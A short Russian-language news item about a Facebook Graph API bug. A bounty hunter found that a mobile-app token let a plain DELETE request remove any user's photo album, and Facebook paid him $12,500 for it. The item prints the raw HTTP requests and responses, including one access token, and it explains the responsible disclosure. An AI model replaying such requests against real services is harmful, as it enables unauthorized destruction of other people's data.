Facebook быстро закрыл уязвимость с удалением чужих фотоальбомов. Несмотря на простоту в реализации, компания выплатила автору баг-репорта Лаксману Мутьяху (Laxman Muthiyah) вознаграждение $12500.
Довольный автор рассказал в блоге, как он нашёл баг.
Парень экспериментировал с запросами через Graph API — программный интерфейс, через который приложения Facebook считывают и записывают информацию. У него было своё приложение и токен, с которыми он экспериментировал, пытаясь удалить свой собственный фотоальбом простым запросом DELETE.
Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD
Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}С помощью обычного токена это сделать не удалось, зато получилось с помощью мобильного токена.
Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=
Response :-
trueК удивлению автора, аналогичный запрос сработал и на удаление чужого фотоальбома. И вообще, на удаление любого фотоальбома на сайте Facebook.
За час своей работы автор получил заслуженный гонорар.
Facebook быстро закрыл баг, добавив четыре строчки кода, не считая скобок.
